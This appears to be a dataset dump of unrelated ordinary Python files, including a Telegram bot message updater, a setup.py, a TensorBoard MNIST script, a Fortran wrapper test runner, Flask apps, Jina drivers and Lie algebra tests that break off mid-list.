content stringlengths 5 1.05M |
|---|
""" A class to send updateable content messages to Telegram. """
import os
import json
import imghdr
from uuid import uuid4
from io import BytesIO
from concurrent.futures import ThreadPoolExecutor
from urllib3 import PoolManager
class TelegramMessage:
    """ Class to send a message with text or image (either a matplotlib figure or path to photo) to a Telegram bot.
    On subsequent updates, the same message is edited to avoid clutter in notifications.
    By default, all messages are silent (with no notifications).
    All of Telegram updates are send with `urllib3`, with no usage of official Telegram Python API.
    Message updates are performed in a separate thread to avoid IO constraints.
    One must supply telegram `token` and `chat_id` either by passing directly or
    setting environment variables `TELEGRAM_TOKEN` and `TELEGRAM_CHAT_ID`. To get them:
        - create a bot <https://core.telegram.org/bots#6-botfather> and copy its `{token}`
        - add the bot to a chat and send it a message such as `/start`
        - go to <https://api.telegram.org/bot`{token}`/getUpdates> to find out the `{chat_id}`
    """
    # Base URL of the Telegram Bot HTTP API; the token is appended to it.
    API = 'https://api.telegram.org/bot'
    # Same user-agent as the official python-telegram-bot library.
    USER_AGENT = 'Python Telegram Bot (https://github.com/python-telegram-bot/python-telegram-bot)'

    def __init__(self, token=None, chat_id=None, silent=True, content=None):
        """ Store credentials, set up the HTTP pool and the single-worker thread.

        :param token: bot token; falls back to the `TELEGRAM_TOKEN` env var.
        :param chat_id: target chat; falls back to the `TELEGRAM_CHAT_ID` env var.
        :param silent: if True, messages are sent without notifications.
        :param content: optional initial content to send right away.
        :raises ValueError: if either the token or the chat id is missing.
        """
        # Connection
        self.token = token or os.getenv('TELEGRAM_TOKEN')
        self.chat_id = chat_id or os.getenv('TELEGRAM_CHAT_ID')
        if self.token is None or self.chat_id is None:
            raise ValueError('Supply `token` and `chat_id` or '
                             'set `TELEGRAM_TOKEN` and `TELEGRAM_CHAT_ID` environment variables!')
        self.connection = PoolManager()
        # State
        self.deleted = False
        self.silent = silent
        # Keep track of the message, its type and previous contents
        self.message_id = None
        self.message_type = None
        self.message_content_hash = None
        # A separate worker to send requests; max_workers=1 serializes all API calls
        self.pool = ThreadPoolExecutor(max_workers=1)
        self.queue = []
        if content is not None:
            self.send(content)

    def submit(self, function, *args, **kwargs):
        """ Run tasks in a separate thread, keeping at most two tasks in a queue: one running, one waiting. """
        if len(self.queue) == 2:
            if self.queue[0].done():
                # The first task is already done, means that the second is running
                # Remove the first, make running the first, put new task as the second
                self.queue.pop(0)
            else:
                # The first task is running, so we can replace the waiting task with the new one
                self.queue.pop(1).cancel()
        try:
            waiting = self.pool.submit(function, *args, **kwargs)
            self.queue.append(waiting)
        except Exception as e: #pylint: disable=broad-except
            # Best-effort: a failed submit (e.g. after shutdown) must not crash the caller
            print(e)

    def post(self, action, **kwargs):
        """ Send a `POST` request with `action` to Telegram API.
        We use the same headers, as used in official Telegram Python API implementation, see
        <https://github.com/python-telegram-bot/python-telegram-bot/blob/master/telegram/utils/request.py>`_".
        """
        url = f'{self.API}{self.token}/{action}'
        # `chat_id` is required by every method we use; extra fields come from kwargs
        fields = {'chat_id': self.chat_id, **kwargs}
        headers = {'connection': 'keep-alive', 'user-agent': self.USER_AGENT}
        return self.connection.request('POST', url, fields=fields, headers=headers)

    def send(self, content):
        """ Send content to a message in a separate thread. """
        if self.deleted:
            raise TypeError('Sending contents to a deleted message is not allowed!')
        self.submit(function=self._send, content=content)
        # Wait for the first message: we need its `message_id` before any edit can happen
        if self.message_id is None:
            self.queue[0].result()

    def _send(self, content):
        """ Worker-side send/edit logic; runs on the executor thread. """
        # No need to re-send the same content
        if hash(content) == self.message_content_hash:
            return None
        # Assert the same type of contents to send, as in initialization
        message_type = 'text' if isinstance(content, str) else 'media'
        if self.message_type and self.message_type != message_type:
            raise TypeError('Sending different types of content in the same message is not allowed!')
        # First message: initialization
        if self.message_id is None:
            if message_type == 'text':
                response = self.post('sendMessage', text=content,
                                     disable_notification=self.silent, parse_mode='MarkdownV2')
            else:
                data = self.content_to_dict(content)
                response = self.post('sendMediaGroup', **data,
                                     disable_notification=self.silent)
            # Remember the id of the created message so later calls edit it in place
            response_ = json.loads(response.data.decode())['result']
            response_ = response_[0] if isinstance(response_, list) else response_
            self.message_id = response_['message_id']
            self.message_type = message_type
        # Subsequent messages: updating contents by editing the message
        else:
            if message_type == 'text':
                response = self.post('editMessageText', text=content,
                                     message_id=self.message_id, parse_mode='MarkdownV2')
            else:
                data = self.content_to_dict(content, group=False)
                response = self.post('editMessageMedia', **data,
                                     message_id=self.message_id)
        self.message_content_hash = hash(content)
        return response

    def delete(self):
        """ Cancel pending message updates and remove it. """
        for task in self.queue:
            if not task.running():
                task.cancel()
        self.pool.shutdown(wait=True)
        if self.message_id is not None:
            self.post('deleteMessage', message_id=self.message_id)
        self.deleted = True

    @staticmethod
    def content_to_dict(content, group=True, **kwargs):
        """ Convert a content (either a path to photo or matplotlib figure) to a telegram-acceptable dictionary.

        :param content: path to an image file (str) or a matplotlib figure.
        :param group: if True, wrap the media entry in a list as required by `sendMediaGroup`;
                      `editMessageMedia` expects a bare dict instead.
        """
        # Convert content to a bytestring
        if isinstance(content, str):
            bytes_ = TelegramMessage.path_to_bytes(content)
        else:
            bytes_ = TelegramMessage.figure_to_bytes(content, **kwargs)
        # Create unique id of attachment, pack entities in json
        attach_id = f'attached{uuid4().hex}'
        attach_fmt = imghdr.what(None, bytes_)
        media_dict = {'media': f'attach://{attach_id}', 'type': 'photo'}
        media_dict = [media_dict] if group else media_dict
        media_dict = json.dumps(media_dict)
        # Resulting dictionary: `media` references the attachment, which is stored as a separate key
        return {'media': media_dict,
                attach_id: ('image', bytes_, attach_fmt)}

    @staticmethod
    def path_to_bytes(path, **_):
        """ Read image file contents as a bytestring. """
        with open(path, 'rb') as file:
            return file.read()

    @staticmethod
    def figure_to_bytes(figure, **kwargs):
        """ Save figure to a buffer in memory, then read from it. """
        # Sensible defaults; caller-provided kwargs override them
        kwargs = {'format': 'png', 'dpi': 100,
                  'bbox_inches': 'tight', 'pad_inches': 0,
                  **kwargs}
        file = BytesIO()
        figure.savefig(file, **kwargs)
        file.seek(0)
        return file.read()
|
from setuptools import setup
import setuptools, os
# Long description shown on PyPI (typos "Image process" / "esay" fixed).
descr = 'Image processing framework based on plugin like imagej, it is easy to glue with scipy.ndimage, scikit-image, opencv, simpleitk, mayavi...and any libraries based on numpy'
def get_data_files():
    """Collect non-Python data files under the ``imagepy`` package tree.

    Returns a dict mapping dotted package names to lists of file names,
    suitable for setuptools' ``package_data`` argument. Returns an empty
    dict when the ``imagepy`` directory does not exist.
    """
    data_files = {}
    for root, dirs, files in os.walk('imagepy', True):
        # Turn the filesystem path into a dotted package name.
        root = root.replace('/', '.').replace('\\', '.')
        # Keep only files that are not Python sources (note: this also
        # skips any file whose name merely contains '.py', e.g. '.pyc').
        files = [i for i in files if '.py' not in i]
        if not files:
            continue
        data_files[root] = files
    return data_files
if __name__ == '__main__':
    # Package metadata and dependency list for the imagepy distribution.
    setup(name='imagepy',
          version='0.22',
          url='https://github.com/Image-Py/imagepy',
          description='interactive python image-processing plugin framework',
          long_description=descr,
          author='YXDragon',
          author_email='yxdragon@imagepy.org',
          license='BSD 3-clause',
          packages=setuptools.find_packages(),
          # Console entry point: `imagepy` launches the GUI via imagepy.show().
          entry_points={
              'console_scripts': [
                  'imagepy = imagepy:show',
              ],
          },
          # Ship non-Python resources found by walking the package tree.
          package_data=get_data_files(),
          install_requires=[
              'scikit-image',
              'scikit-learn',
              'shapely',
              'pypubsub',
              'wxpython',
              'read_roi',
              'numpy-stl',
              'pydicom',
              'pystackreg',
              'pandas',
              'xlrd',
              'xlwt',
              'openpyxl',
              'markdown',
              'python-markdown-math',
              'numba',
              'dulwich'
          ],
          )
|
import torch
import torchvision
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
# Writer will output to ./runs/ directory by default
writer = SummaryWriter()
# Scale MNIST digits to tensors and normalize the single channel to roughly [-1, 1].
transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (0.5,))])
trainset = datasets.MNIST('mnist_train', train=True, download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=64, shuffle=True)
# Untrained ResNet-50 (pretrained=False) used purely for graph visualization.
model = torchvision.models.resnet50(False)
# Have ResNet model take in grayscale rather than RGB
model.conv1 = torch.nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
# Log a single batch of input images and the model's computation graph.
images, labels = next(iter(trainloader))
grid = torchvision.utils.make_grid(images)
writer.add_image('images', grid, 0)
writer.add_graph(model, images)
writer.close()
|
#!/usr/bin/env python
# Execute this script to run through all tests (wrap, build, run).
# Check that the correct Fortran compiler is set in Tests.mk. If
# necessary, add "-c gfortran" to OPTS below (gfortran name mangling
# is currently the default)
from __future__ import print_function
import sys
import os
import glob
import subprocess
OPTS = '-g --clean -d wrap' # FortWrap options
# Add the executable to the command. This way the tests are run with
# the chosen python instead of the default
cmd = sys.executable + ' ' + os.path.normpath('../../fortwrap.py')
# Per-test overrides of the default FortWrap options.
custom_opts = { 'c_arrays' : OPTS + ' --no-vector',
                'interface_file' : OPTS + ' -i interface.i',
                'multidim_arrays' : OPTS + ' --no-vector --no-fmat',
                'strings2' : OPTS + ' --no-std-string' }
# Tests for demonstration purposes only:
excludes = [ 'comments' ]
tests_dir = os.path.abspath('tests')
os.chdir('tests')
tests = glob.glob('*')
num_err = 0
# Sink for make output; only pass/fail status is printed here.
FNULL = open(os.devnull, 'w')
# Use a command arg to prevent making clean
make_clean = True
if len(sys.argv) > 1:
    print("Not making clean")
    make_clean = False
failed_tests = []
for test in tests:
    # Each test lives in its own subdirectory; return to the root each iteration.
    os.chdir(tests_dir)
    if test in excludes or (not os.path.isdir(test)):
        continue
    if not os.path.exists(os.path.join(test, 'Makefile')):
        # This can happen if there are leftover directories for tests
        # that only exist on a different branch
        continue
    print("Running test:", test, end=' ')
    os.chdir(test)
    # Create "wrap" directory if doesn't exist:
    if not os.path.exists('wrap'):
        os.makedirs('wrap')
    # Run wrapper generator
    if test in custom_opts:
        opts = custom_opts[test]
    else:
        opts = OPTS
    if make_clean:
        subprocess.call('make clean', stdout=FNULL, shell=True)
    p = subprocess.Popen(cmd + ' ' + opts, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    stdout, stderr = p.communicate()
    # FortWrap may exit 0 but still report errors on stderr, so check both.
    if p.returncode != 0 or 'Error:' in stderr.decode():
        num_err += 1
        failed_tests.append((test,'wrapper'))
        print("[FAIL: wrapper]")
        continue
    # Build test program
    stat = subprocess.call('make', stdout=FNULL)
    if stat!=0:
        num_err += 1
        failed_tests.append((test,'build'))
        print("[FAIL: build]")
        continue
    # Run test program
    #
    # This command can be tricky on Windows if the path contains
    # spaces. With os.system, they need to be protected with outer
    # quotes (so Windows sees the quotes); that isn't necessary with
    # subprocess.call
    stat = subprocess.call(os.path.abspath('prog'))
    if stat!=0:
        num_err += 1
        failed_tests.append((test,'run'))
        print("[FAIL: run]")
        continue
    print("[PASS]")
if num_err == 0:
    print("Tests successful")
else:
    print(num_err, "error(s):", failed_tests)
|
from dataclasses import dataclass
from typing import List
@dataclass
class InceptionConfiguration:
    """Configuration container for an inception run."""
    # SMILES strings seeding the process
    smiles: List[str]
    # maximum number of entries kept in memory
    memory_size: int
    # number of entries drawn per sample
    sample_size: int
|
# Solution of MarchCode Day 3
# Prompt the user for a month number and print how many days it has.
print("""Choose a number corresponding to the month
1. January
2. February
3. March
4. April
5. May
6. June
7. July
8. August
9. September
10. October
11. November
12. December""")
n = int(input("Enter the number here: \n"))
# Set membership replaces the long `or` chains of equality tests.
if n in {1, 3, 5, 7, 8, 10, 12}:
    print("31 days")
elif n in {4, 6, 9, 11}:
    print("30 days")
elif n == 2:
    # February: 28 days, 29 in leap years (year is not asked for).
    print("28/29 days")
else:
    print("Please choose a number between 1 to 12")
|
from libai.config import LazyCall
from omegaconf import OmegaConf
from libai.data import build_nlp_test_loader, build_nlp_train_val_test_loader
from libai.data.datasets import GPT2Dataset
from libai.data.data_utils import get_indexed_dataset
from libai.tokenizer import GPT2Tokenizer
# Tokenizer configuration: GPT-2 BPE files are lazily instantiated by LazyCall.
tokenization = OmegaConf.create()
tokenization.tokenizer = LazyCall(GPT2Tokenizer)(
    vocab_file="/workspace/data/gpt_dataset/gpt2-vocab.json",
    merges_file="/workspace/data/gpt_dataset/gpt2-merges.txt",
    do_lower_case=True,
    do_chinese_wwm=True,
)
# Do not append an end-of-document token after each sample.
tokenization.append_eod = False
tokenization.make_vocab_size_divisible_by = 128
# Dataloader configuration: a single memory-mapped GPT2 dataset split
# into train/val/test by the ratios in `splits`.
dataloader = OmegaConf.create()
dataloader.train = LazyCall(build_nlp_train_val_test_loader)(
    dataset=[
        LazyCall(GPT2Dataset)(
            data_prefix="/workspace/data/libai_dataset/loss_compara_content_sentence",
            indexed_dataset=LazyCall(get_indexed_dataset)(
                data_prefix="/workspace/data/libai_dataset/loss_compara_content_sentence",
                data_impl="mmap",
                skip_warmup=False,
            ),
            max_seq_length=1024,
        ),
    ],
    # train/val/test proportions for the single dataset above
    splits=[[949.0, 50.0, 1.0]],
    weights=[1.0],
    num_workers=0,
)
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
''' Computational semantics course @ RUG-2019
Lecturer: L.Abzianidze@rug.nl
Assignment 4: Natural language inference with first-order logic theorem proving
'''
def codalab_html(scores, cm, filename):
    '''Write an html file with scores and a confusion matrix.

    scores   -- an (accuracy, precision, recall) triple of floats
    cm       -- confusion-matrix mapping keyed by (gold_initial, pred_initial)
                pairs, each initial drawn from 'C', 'E', 'N'
    filename -- path of the html file to write
    '''
    # internal css style and other styling
    (acc, prec, rec) = scores
    style = ("table, th, td { border: 1px solid black; border-collapse: collapse;}\n"
             "td {text-align: right;}\n"
             ".ltd {text-align: left;}\n"
             ".lab, th {background-color: #648ca8; color: #fff;}\n"
             "th, td {padding: 2px 10px 2px 10px;}\n"
             ".diag {background-color: #77dd77;}\n"
             )
    header = '<head>\n<title>Detailed results</title>\n<style>\n{}\n</style>\n</head>'.format(style)
    tag = 'p'
    # create a confusion table
    body = '<table>\n'
    body += '<tr>\n<th style="color:black">Gold \ Pred</th>\n<th>C</th>\n<th>E</th>\n<th>N</th>\n</tr>\n'
    for g in ['CONTRADICTION', 'ENTAILMENT', 'NEUTRAL']:
        # Fixed: the row label's bold tag was never closed ('<b>{}<b>').
        body += '<tr>\n<td class="ltd lab"><b>{}</b></td>\n'.format(g)
        for p in 'CEN':
            # highlight the diagonal (correct-prediction) cells
            sty = ' class="diag"' if g[0] == p else ''
            body += '<td{}>{}</td>\n'.format(sty, cm[(g[0],p)])
        body += '</tr>\n'
    body += '</table>\n'
    # generating the content
    body += '<{0}>Accuracy: <b>{1}</b></{0}>\n'.format(tag, round(acc, 4))
    body += '<{0}>Precision: <b>{1}</b></{0}>\n'.format(tag, round(prec, 3))
    # Fixed: the recall line emitted a stray duplicate '</b>' closing tag.
    body += '<{0}>Recall: <b>{1}</b></{0}>\n'.format(tag, round(rec, 3))
    html = '<!DOCTYPE html>\n<meta charset=utf-8>\n<html>\n{}\n<body>\n{}\n</body>\n</html>'.format(header, body)
    with open(filename, 'w') as f:
        f.write(html)
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
    """Flask/application configuration, read from the environment with
    development-friendly fallbacks."""
    # Session-signing secret; override via the SECRET_KEY env var in production.
    SECRET_KEY = os.environ.get('SECRET_KEY') or '**************'
    # MySQL connection parameters (defaults target a local dev database).
    MYSQL_USER = os.environ.get('MYSQL_DATABASE_USER') or 'root'
    MYSQL_PASSWORD = os.environ.get('MYSQL_DATABASE_PASSWORD') or ''
    MYSQL_DB = os.environ.get('MYSQL_DATABASE_DB') or 'metro-hacks'
    MYSQL_HOST = os.environ.get('MYSQL_DATABASE_HOST') or 'localhost'
    # Sessions expire when the browser closes.
    SESSION_PERMANENT = False
    SESSION_COOKIE_SAMESITE=None
    SESSION_COOKIE_SECURE=True
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import ctypes
import random
from . import BaseExecutableDriver
from .helper import array2pb, pb_obj2dict, pb2array
class BaseCraftDriver(BaseExecutableDriver):
    """Drivers inherited from this Driver will bind :meth:`craft` by default """

    def __init__(self, executor: str = None, method: str = 'craft', *args, **kwargs):
        # Bind the executor's `craft` method as this driver's exec_fn.
        super().__init__(executor, method, *args, **kwargs)
class ChunkCraftDriver(BaseCraftDriver):
    """Craft the chunk-level information on given keys using the executor
    """

    def __call__(self, *args, **kwargs):
        no_chunk_docs = []  # ids of docs that arrived without any chunks
        for d in self.req.docs:
            if not d.chunks:
                no_chunk_docs.append(d.doc_id)
                continue
            _chunks_to_add = []
            for c in d.chunks:
                # Build the executor's kwargs from the chunk fields it requires.
                _args_dict = pb_obj2dict(c, self.exec.required_keys)
                if 'blob' in self.exec.required_keys:
                    # blobs must be converted from protobuf to ndarray first
                    _args_dict['blob'] = pb2array(c.blob)
                ret = self.exec_fn(**_args_dict)
                # dict result: update this chunk's fields in place
                if isinstance(ret, dict):
                    for k, v in ret.items():
                        if k == 'blob':
                            c.blob.CopyFrom(array2pb(v))
                        else:
                            setattr(c, k, v)
                    continue
                # list result: collect new chunks, appended after this loop to
                # avoid mutating d.chunks while iterating it
                if isinstance(ret, list):
                    for chunk_dict in ret:
                        _chunks_to_add.append(chunk_dict)
            if len(_chunks_to_add) > 0:
                for c_dict in _chunks_to_add:
                    c = d.chunks.add()
                    for k, v in c_dict.items():
                        if k == 'blob':
                            c.blob.CopyFrom(array2pb(v))
                        elif k == 'chunk_id':
                            # chunk_id is owned by this driver; executor-supplied ids are ignored
                            self.logger.warning(f'you are assigning a chunk_id in in {self.exec.__class__}, '
                                                f'is it intentional? chunk_id will be override by {self.__class__} '
                                                f'anyway')
                        else:
                            setattr(c, k, v)
                    c.length = len(_chunks_to_add) + len(d.chunks)
                    # random unsigned-32-bit chunk id
                    c.chunk_id = random.randint(0, ctypes.c_uint(-1).value)
            d.length = len(_chunks_to_add) + len(d.chunks)
        if no_chunk_docs:
            self.logger.warning('these docs contain no chunk: %s' % no_chunk_docs)
class DocCraftDriver(BaseCraftDriver):
    """Apply the executor's craft function at the document level.

    For every document in the request, the executor is invoked with the
    document fields named in ``required_keys``; the mapping it returns is
    written back onto the document's attributes.
    """

    def __call__(self, *args, **kwargs):
        for doc in self.req.docs:
            crafted = self.exec_fn(**pb_obj2dict(doc, self.exec.required_keys))
            for field, value in crafted.items():
                setattr(doc, field, value)
class SegmentDriver(BaseCraftDriver):
    """Segment document into chunks using the executor
    .. note::
        ``chunk_id`` is auto-assign incrementally or randomly depends on ``first_chunk_id`` and ``random_chunk_id``.
        no need to self-assign it in your segmenter
    """

    def __init__(
            self, first_chunk_id: int = 0, random_chunk_id: bool = True, save_raw_bytes: bool = False, *args, **kwargs):
        """
        :param first_chunk_id: first id used when ids are assigned incrementally
        :param random_chunk_id: if True, ids are random unsigned 32-bit ints instead
        :param save_raw_bytes: if True, copy the doc's raw bytes into its meta_info
        """
        super().__init__(*args, **kwargs)
        self.first_chunk_id = first_chunk_id
        self.random_chunk_id = random_chunk_id
        self.save_raw_bytes = save_raw_bytes

    def __call__(self, *args, **kwargs):
        for d in self.req.docs:
            # The segmenter returns a list of chunk dicts (or a falsy value).
            ret = self.exec_fn(**pb_obj2dict(d, self.exec.required_keys))
            if ret:
                for r in ret:
                    c = d.chunks.add()
                    for k, v in r.items():
                        if k == 'blob':
                            # ndarray payloads must be converted to protobuf
                            c.blob.CopyFrom(array2pb(v))
                        elif k == 'chunk_id':
                            # chunk_id is owned by this driver; segmenter-supplied ids are ignored
                            self.logger.warning(f'you are assigning a chunk_id in in {self.exec.__class__}, '
                                                f'is it intentional? chunk_id will be override by {self.__class__} '
                                                f'anyway')
                        else:
                            setattr(c, k, v)
                    c.length = len(ret)
                    # Either sequential ids starting at first_chunk_id, or random uint32 ids.
                    c.chunk_id = self.first_chunk_id if not self.random_chunk_id else random.randint(0, ctypes.c_uint(
                        -1).value)
                    c.doc_id = d.doc_id
                    self.first_chunk_id += 1
                d.length = len(ret)
                if self.save_raw_bytes:
                    d.meta_info = d.raw_bytes
            else:
                self.logger.warning('doc %d gives no chunk' % d.doc_id)
|
from flask import Flask, request, redirect, render_template, flash, jsonify
from flaskmogrify.forms import TransmogrificationForm
__author__ = 'Daniel Langsam'
__email__ = 'daniel@langsam.org'
__version__ = '0.0.16'
# Application object; configuration is loaded from this module's globals.
app = Flask(__name__)
app.config.from_object(__name__)
# NOTE(review): a hard-coded secret key is fine for a demo, but in any real
# deployment it should come from the environment, not source control.
app.config.update(dict(
    SECRET_KEY='super_hard_to_guess_secret_key_1231214123167545',
))
@app.route('/get_transmogrification',methods=['POST'])
def transmogrify_wihtout_AJAX():
    """Non-AJAX fallback: apply the selected transmogrify function to the
    posted form data and render the result page.

    NOTE(review): the function name has a typo ('wihtout'); kept as-is since
    renaming could break external references to the view function.
    """
    # Which transform was picked via the radio buttons
    fcn_index = int(request.form['radio_tfunction'])
    tfunction = app.config['transmogrify_functions'][fcn_index]
    return render_template('/results_non_AJAX.html',
                           display_text=str(tfunction(request.form['data_to_transmogrify_field'])))
@app.route('/get_transmogrification_by_ajax', methods=['POST'])
def ajax_transmogrify():
    """Apply the selected transmogrify function to posted text, returning JSON."""
    index = int(request.form['tfunction_index'])
    transform = app.config['transmogrify_functions'][index]
    return jsonify({ 'text': transform(request.form['text'])})
@app.route('/transmogrify', methods=['GET','POST'])
def transmogrify_main():
    """Main page: renders the entry form, or (non-AJAX POST) redirects to the
    results endpoint after a successful submit."""
    form = TransmogrificationForm()
    if form.validate_on_submit():  # non-AJAX fallback, e.g. if Javascript disabled
        flash("Transmogrification complete!")
        return redirect('/get_transmogrification') #/results_non_AJAX.html',
    # Populate the radio choices from the configured transform functions.
    form.radio_choices.choices = [fcn.__name__ for fcn in app.config['transmogrify_functions']]
    return render_template('transmogrify.html',
                           title="Lab Data Entry",
                           form=form,
                           example_text=app.config['transmogrify_sample_text'])
@app.route('/')
def redirect_to_transmogrify_main():
    """Root URL: forward visitors to the main transmogrify page."""
    return redirect("/transmogrify")
|
from liesym import F4, E, Basis
from sympy import Matrix, Rational, S
def test_F4():
    """Regression-check the F4 exceptional Lie algebra against known values:
    dimensions, simple roots, Cartan/cocartan/omega/metric matrices,
    reflection matrices, fundamental weights and the full root system."""
    F4_ = F4()
    # test subclass items
    assert F4_.dimension == 4
    assert F4_.n_pos_roots == 24
    assert F4_.simple_roots == [
        Matrix([[1, -1, 0, 0]]),
        Matrix([[0, 1, -1, 0]]),
        Matrix([[0, 0, 1, 0]]),
        Matrix([[-S.Half, -S.Half, -S.Half, -S.Half]]),
    ]
    # fundamental weights are returned in the orthogonal basis
    fw = F4_.fundamental_weights[0]
    assert fw.basis == Basis.ORTHO
    assert F4_.to_omega(fw) == Matrix([[1, 0, 0, 0]])
    # baseclass generated
    assert F4_.cartan_matrix == Matrix(
        [[2, -1, 0, 0], [-1, 2, -2, 0], [0, -1, 2, -1], [0, 0, -1, 2]])
    assert F4_.cocartan_matrix == Matrix(
        [[1, -1, 0, 0], [0, 1, -1, 0], [0, 0, 2, 0], [-1, -1, -1, -1]])
    assert F4_.omega_matrix == Matrix(
        [[1, 0, 0, -1], [1, 1, 0, -2], [S.Half, S.Half, S.Half, -3*S.Half], [0, 0, 0, -1]])
    assert F4_.metric_tensor == Matrix(
        [[2, 3, 2, 1], [3, 6, 4, 2], [2, 4, 3, 3*S.Half], [1, 2, 3*S.Half, 1]])
    # one reflection matrix per simple root (note: attribute name has a
    # library-side typo, 'matricies')
    assert F4_.reflection_matricies == [
        Matrix([
            [0, 1, 0, 0],
            [1, 0, 0, 0],
            [0, 0, 1, 0],
            [0, 0, 0, 1]]),
        Matrix([
            [1, 0, 0, 0],
            [0, 0, 1, 0],
            [0, 1, 0, 0],
            [0, 0, 0, 1]]),
        Matrix([
            [1, 0, 0, 0],
            [0, 1, 0, 0],
            [0, 0, -1, 0],
            [0, 0, 0, 1]]),
        Matrix([
            [S.Half, -S.Half, -S.Half, -S.Half],
            [-S.Half, S.Half, -S.Half, -S.Half],
            [-S.Half, -S.Half, S.Half, -S.Half],
            [-S.Half, -S.Half, -S.Half, S.Half]])]
    assert F4_.fundamental_weights == [Matrix([[1, 0, 0, -1]]), Matrix(
        [[1, 1, 0, -2]]), Matrix([[S.Half, S.Half, S.Half, -3*S.Half]]), Matrix([[0, 0, 0, -1]])]
    # backend: full root system (48 roots + 4 zero weights), in the omega basis
    assert [F4_.to_omega(x) for x in F4_.root_system()] == [
        Matrix([[1, 0, 0, 0]]),
        Matrix([[-1, 1, 0, 0]]),
        Matrix([[0, -1, 2, 0]]),
        Matrix([[0, 0, 0, 1]]),
        Matrix([[0, 0, 1, -1]]),
        Matrix([[0, 1, -2, 2]]),
        Matrix([[0, 1, -1, 0]]),
        Matrix([[1, -1, 0, 2]]),
        Matrix([[-1, 0, 0, 2]]),
        Matrix([[0, 1, 0, -2]]),
        Matrix([[1, -1, 1, 0]]),
        Matrix([[-1, 0, 1, 0]]),
        Matrix([[1, -1, 2, -2]]),
        Matrix([[1, 0, -1, 1]]),
        Matrix([[-1, 0, 2, -2]]),
        Matrix([[-1, 1, -1, 1]]),
        Matrix([[1, 0, 0, -1]]),
        Matrix([[-1, 1, 0, -1]]),
        Matrix([[0, -1, 1, 1]]),
        Matrix([[1, 1, -2, 0]]),
        Matrix([[-1, 2, -2, 0]]),
        Matrix([[0, -1, 2, -1]]),
        Matrix([[0, 0, -1, 2]]),
        Matrix([[2, -1, 0, 0]]),
        Matrix([[0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0]]),
        Matrix([[-2, 1, 0, 0]]),
        Matrix([[0, 0, 1, -2]]),
        Matrix([[0, 1, -2, 1]]),
        Matrix([[1, -2, 2, 0]]),
        Matrix([[-1, -1, 2, 0]]),
        Matrix([[0, 1, -1, -1]]),
        Matrix([[1, -1, 0, 1]]),
        Matrix([[-1, 0, 0, 1]]),
        Matrix([[1, -1, 1, -1]]),
        Matrix([[1, 0, -2, 2]]),
        Matrix([[-1, 0, 1, -1]]),
        Matrix([[-1, 1, -2, 2]]),
        Matrix([[1, 0, -1, 0]]),
        Matrix([[-1, 1, -1, 0]]),
        Matrix([[0, -1, 0, 2]]),
        Matrix([[1, 0, 0, -2]]),
        Matrix([[-1, 1, 0, -2]]),
        Matrix([[0, -1, 1, 0]]),
        Matrix([[0, -1, 2, -2]]),
        Matrix([[0, 0, -1, 1]]),
        Matrix([[0, 0, 0, -1]]),
        Matrix([[0, 1, -2, 0]]),
        Matrix([[1, -1, 0, 0]]),
        Matrix([[-1, 0, 0, 0]]),
    ]
def test_E6():
    """Regression-check the E6 exceptional Lie algebra against known values:
    dimensions, simple roots, Cartan/omega/metric matrices, the full root
    system and the positive roots."""
    E6 = E(6)
    # test subclass items
    assert E6.dimension == 6
    assert E6.n_pos_roots == 36
    assert E6.simple_roots == [
        Matrix([[S.Half, -S.Half, -S.Half, -S.Half, -
                 S.Half, -S.Half, -S.Half, S.Half]]),
        Matrix([[-1, 1, 0, 0, 0, 0, 0, 0]]),
        Matrix([[0, -1, 1, 0, 0, 0, 0, 0]]),
        Matrix([[0, 0, -1, 1, 0, 0, 0, 0]]),
        Matrix([[0, 0, 0, -1, 1, 0, 0, 0]]),
        Matrix([[1, 1, 0, 0, 0, 0, 0, 0]]),
    ]
    # fundamental weights are returned in the orthogonal basis
    fw = E6.fundamental_weights[0]
    assert fw.basis == Basis.ORTHO
    assert E6.to_omega(fw) == Matrix([[1, 0, 0, 0, 0, 0]])
    # baseclass generated
    assert E6.cartan_matrix == Matrix([
        [2, -1, 0, 0, 0, 0],
        [-1, 2, -1, 0, 0, 0],
        [0, -1, 2, -1, 0, -1],
        [0, 0, -1, 2, -1, 0],
        [0, 0, 0, -1, 2, 0],
        [0, 0, -1, 0, 0, 2]])
    assert E6.omega_matrix == Matrix(
        [[0, 0, 0, 0, 0, Rational(-2, 3), Rational(-2, 3), Rational(2, 3)],
         [Rational(-1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2),
          Rational(1, 2), Rational(-5, 6), Rational(-5, 6), Rational(5, 6)],
         [0, 0, 1, 1, 1, -1, -1, 1],
         [0, 0, 0, 1, 1, Rational(-2, 3), Rational(-2, 3), Rational(2, 3)],
         [0, 0, 0, 0, 1, Rational(-1, 3), Rational(-1, 3), Rational(1, 3)],
         [Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(-1, 2), Rational(-1, 2), Rational(1, 2)], ])
    assert E6.metric_tensor == Matrix(
        [[Rational(4, 3), Rational(5, 3), 2, Rational(4, 3), Rational(2, 3), 1],
         [Rational(5, 3), Rational(10, 3), 4,
          Rational(8, 3), Rational(4, 3), 2],
         [2, 4, 6, 4, 2, 3],
         [Rational(4, 3), Rational(8, 3), 4,
          Rational(10, 3), Rational(5, 3), 2],
         [Rational(2, 3), Rational(4, 3), 2,
          Rational(5, 3), Rational(4, 3), 1],
         [1, 2, 3, 2, 1, 2], ])
    # backend: full root system (72 roots + 6 zero weights), in the omega basis
    assert [E6.to_omega(x) for x in E6.root_system()] == [
        Matrix([[0, 0, 0, 0, 0, 1]]),
        Matrix([[0, 0, 1, 0, 0, -1]]),
        Matrix([[0, 1, -1, 1, 0, 0]]),
        Matrix([[0, 1, 0, -1, 1, 0]]),
        Matrix([[1, -1, 0, 1, 0, 0]]),
        Matrix([[-1, 0, 0, 1, 0, 0]]),
        Matrix([[0, 1, 0, 0, -1, 0]]),
